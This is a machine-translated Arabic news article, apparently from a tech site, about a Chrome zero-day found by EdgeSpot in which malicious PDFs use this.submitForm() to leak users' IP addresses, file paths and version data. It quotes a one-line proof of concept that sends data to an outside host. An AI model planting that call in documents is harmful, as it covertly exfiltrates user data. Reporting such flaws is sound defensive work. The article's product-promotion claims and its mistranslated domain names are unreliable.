يتيح خطأ Chrome للمتسللين جمع بيانات المستخدم عبر ملفات PDF

  • اكتشفت EdgeSpot ثغرة أمنية مثيرة للاهتمام في يوم الصفر تستغل مستندات PDF في Chrome.
  • هذا القابلية للتأثر يمكن أن يؤذيك عن طريق جمع البيانات الحساسة على جهاز الكمبيوتر الخاص بك.
  • استكشف صفحة الويب والسحابة لمزيد من الأفكار حول الأدوات والخدمات الأخرى.
  • إذا كنت مهتمًا بالمتصفحات ، فنحن نقدم الكثير من المعلومات عنها في موقعنا مركز المتصفحات.
يتيح خطأ Chrome للمتسللين جمع بيانات المستخدم من ملفات PDF الخاصة بك
ماذا عن استخدام أفضل مدير مستندات؟
اجعل جميع مستنداتك سهلة الوصول وآمنة باستخدام Adobe Acrobat Reader. ستتيح لك أداة إدارة المستندات هذه أيضًا التوقيع الإلكتروني وإنشاء نماذج رسمية لتوفير وقتك في العمل. احصل عليه لجهاز الكمبيوتر الخاص بك وستتمكن من:
  • افتح وطبع وحرر جميع أنواع ملفات PDF وأنواع الملفات الأخرى
  • تعبئة نماذج PDF أسهل
  • احتفظ بمستنداتك الأساسية مشفرة

احصل على جميع التطبيقات بسعر خاص!

برنامج إدارة المستندات Nr.1 ​​في العالم الآن بسعر رائع ، لذا أسرع!

اكتشفت خدمة الكشف عن الاستغلال EdgeSpot أمرًا مثيرًا للاهتمام كروم ثغرة يوم الصفر تستغل مستندات PDF.

الثغرة الأمنية تسمح للمهاجمين حصاد البيانات الحساسة باستخدام مستندات PDF ضارة مفتوحة في Chrome.

بمجرد أن تفتح الضحية ملفات PDF ذات الصلة في Google Chrome ، يبدأ برنامج ضار في العمل في الخلفية من خلال جمع بيانات المستخدم.

ثم يتم إعادة توجيه البيانات إلى الخادم البعيد الذي يتحكم فيه المتسللون. قد تتساءل عن البيانات التي يمتصها المهاجمون ، فهم يستهدفون البيانات التالية على جهاز الكمبيوتر الخاص بك:

  • عنوان IP
  • المسار الكامل لملف PDF على النظام
  • إصدارات OS و Chrome

احذر من ملفات PDF المليئة بالبرامج الضارة

خبراء مراقب هذا واحد من المجالين readnotify [.] com أو المتعاون [.] صافي كان يتلقى البيانات.

وكشفوا أن المهاجمين يستخدمون this.submitForm () واجهة برمجة تطبيقات PDF Javascript لجمع المعلومات الحساسة للمستخدمين.

اختبرناها مع الحد الأدنى من PoC ، مثل استدعاء API بسيط this.submitForm (‘ http://google.com/test’) سيجعل Google Chrome يرسل البيانات الشخصية إلى google.com.

تم استغلال خطأ Chrome هذا بواسطة مجموعتين متميزتين من ملفات PDF الضارة ، وكلاهما تم تداولهما في أكتوبر 2017 وسبتمبر 2018 ، على التوالي.

والجدير بالذكر أن البيانات التي تم جمعها يمكن أن يستخدمها المهاجمون لضبط الهجمات في المستقبل. تشير التقارير إلى أنه تم تجميع الدفعة الأولى من الملفات باستخدام خدمة تتبع ملفات PDF في ReadNotify.

يمكن للمستخدمين الاستفادة من الخدمة لتتبع وجهات نظر المستخدم. لم تشارك EdgeSpot أي تفاصيل تتعلق بطبيعة المجموعة الثانية من ملفات PDF.

نصيحة سريعة: قم بتغيير متصفحك إلى Opera

في هذه الأوقات العصيبة ، نتعرض للهجوم بالبرامج الضارة والتصيد الاحتيالي وأحصنة طروادة في كل خطوة ، لذلك يتعين علينا أن نكون أكثر يقظة ونبقى محميًا.

ونظرًا لأن هذه مشكلة خاصة بـ Chrome ، يمكنك تجنب هذا التهديد وكل الآخرين باستخدام متصفح موجه للأمان مثل أوبرا.

يأتي هذا المتصفح مع مانع إعلانات مدمج لا يزيل فقط مثل هذه الانحرافات ولكن أيضًا يمنع التحليلات النصية ، وتتبع البكسل ، وطرق جمع البيانات الخاصة بك.

وإذا كنت تريد أن تكون متأكدًا تمامًا من أنك تبتعد عن أي خطر ، فاحرص على البقاء خلف الجهاز المدمج VPN خدمة مجانية 100٪ للاستخدام لفترة غير محدودة.

أوبرا

أوبرا

يوفر Opera الحماية المثالية من التهديدات مع أداة حظر الإعلانات المضمنة وخدمة VPN مجانًا!

احصل عليه مجانا
زيارة الموقع

كيف يمكنني البقاء محميًا من ثغرات PDF؟

قم بتنزيل Adobe Acrobat PRO

برنامج Adobe Acrobat PRO

يتطابق Adobe و Chrome بشكل جيد عندما يتعلق الأمر بمعالجة ملفات PDF. من خلال تثبيت Adobe Extension for Chrome ، يمكنك مراجعة ملفات PDF ومعالجتها حسب رغبتك دون مغادرة متصفحك المفضل.

على الرغم من هيكلها القوي ، فقد لا يتم اكتشاف البرامج الضارة المخفية في ملفات PDF إذا كنت تستخدم الإصدار القياسي من القارئ.

يوصى باستخدام الإصدار الاحترافي لضمان حمايتك والحفاظ على بياناتك بعيدًا عن المتسللين.

على الرغم من أنه ليس مجانيًا ، إلا أن السعر الذي ستدفعه صغير نوعًا ما مقابل مجموعة كبيرة من الميزات الإضافية التي ستستمتع بها بما في ذلك الأمان المعزز لملفات PDF الخاصة بك.

هناك أيضًا نسخة تجريبية مجانية مدتها 7 أيام متضمنة حتى تتمكن من تذوق تجربة Pro الكاملة قبل إجراء عملية الشراء.

برنامج Adobe Acrobat PRO

برنامج Adobe Acrobat PRO

ابتعد عن البرامج الضارة عن طريق تنزيل Adobe Acrobat PRO. يحتوي على الكثير من الميزات أكثر من الإصدار المجاني ويحافظ على أمان بياناتك.

تجربة مجانية
زيارة الموقع

إذا كنت تريد أن تكون آمنًا أثناء تصفح الإنترنت ، فستحتاج إلى الحصول على أداة مخصصة بالكامل لتأمين شبكتك. قم بتثبيت Private Internet Access الآن وتأمين نفسك. إنه يحمي جهاز الكمبيوتر الخاص بك من الهجمات أثناء التصفح ، ويخفي عنوان IP الخاص بك ، ويمنع كل الوصول غير المرغوب فيه.


أرادت خدمة الكشف عن Exploit EdgeSpot تنبيه مستخدمي Chrome بشأن المخاطر المحتملة لأنه لم يكن من المتوقع إصدار التصحيح في المستقبل القريب.

أبلغت EdgeSpot Google عن الثغرة الأمنية العام الماضي ووعدت الشركة بإصدار تصحيح في أواخر أبريل.

ومع ذلك ، يمكنك التفكير في استخدام حل مؤقت للمشكلة من خلال عرض مستندات PDF المستلمة محليًا باستخدام تطبيق قارئ آخر.

بدلاً من ذلك ، يمكنك أيضًا فتح مستندات PDF الخاصة بك في Chrome عن طريق فصل أنظمتك عن الإنترنت.

أسئلة مكررة

  • نعم إنها كذلك. ولكن إذا كنت تريد اختيارًا أوسع ، استكشف أفضل اختياراتنا لـ كرومالإجمالية ملحقات في هذا الدليل الكامل.

  • تيهنا الكثير من الامتدادات التي تسمح ملفات PDF يتم المعالجة. الشيك خارج منطقتنا دليل ممتاز حول أفضل ملحقات PDF لمتصفح Chrome.

  • إنه لا يعمل ولكن يمكنك تنشيطه بسرعة. هنا لدينا دليل شامل حول كيفية تمكين منشئ رمز الاستجابة السريعة في Chrome.

كيفية فحص Google Drive بحثًا عن فيروسات [أفضل الطرق]

كيفية فحص Google Drive بحثًا عن فيروسات [أفضل الطرق]الأمن الإلكترونيمحرك جوجل

إذا حصلت على لا يمكن لـ Google Drive فحص هذا الملف بحثًا عن فيروسات الرسالة ، فهذا يعني أن ملفك يزيد عن 100 ميغابايت.تحتوي خدمة التخزين السحابي هذه في الواقع على مضاد فيروسات خاص بها للملفات الأصغر...

اقرأ أكثر
كيف تتخلص من البرمجيات الخبيثة. يتسغل. وكيل. رسالة عامة

كيف تتخلص من البرمجيات الخبيثة. يتسغل. وكيل. رسالة عامةإزالة البرمجيات الخبيثةالأمن الإلكتروني

البرمجيات الخبيثة. يتسغل. وكيل. يظهر التحذير العام عند العمل في Word و PowerPoint.كما أكد عدد لا يحصى من المستخدمين ، فإن الخطأ يمنعهم من حفظ ملفات Microsoft Office.قم بالتبديل إلى برنامج مكافحة في...

اقرأ أكثر
5+ أفضل برامج إدارة كلمات مرور Windows 10 لاستخدامها هذا العام

5+ أفضل برامج إدارة كلمات مرور Windows 10 لاستخدامها هذا العامإدارة كلمات المرورالأمن الإلكتروني

خبرة في البرامج والأجهزة الموفرة للوقت تساعد 200 مليون مستخدم سنويًا. إرشادك بنصائح إرشادية وأخبار ونصائح لترقية حياتك التقنية.يعد Dashlane password manager أداة رائعة تبرز بين منافسيها من خلال الع...

اقرأ أكثر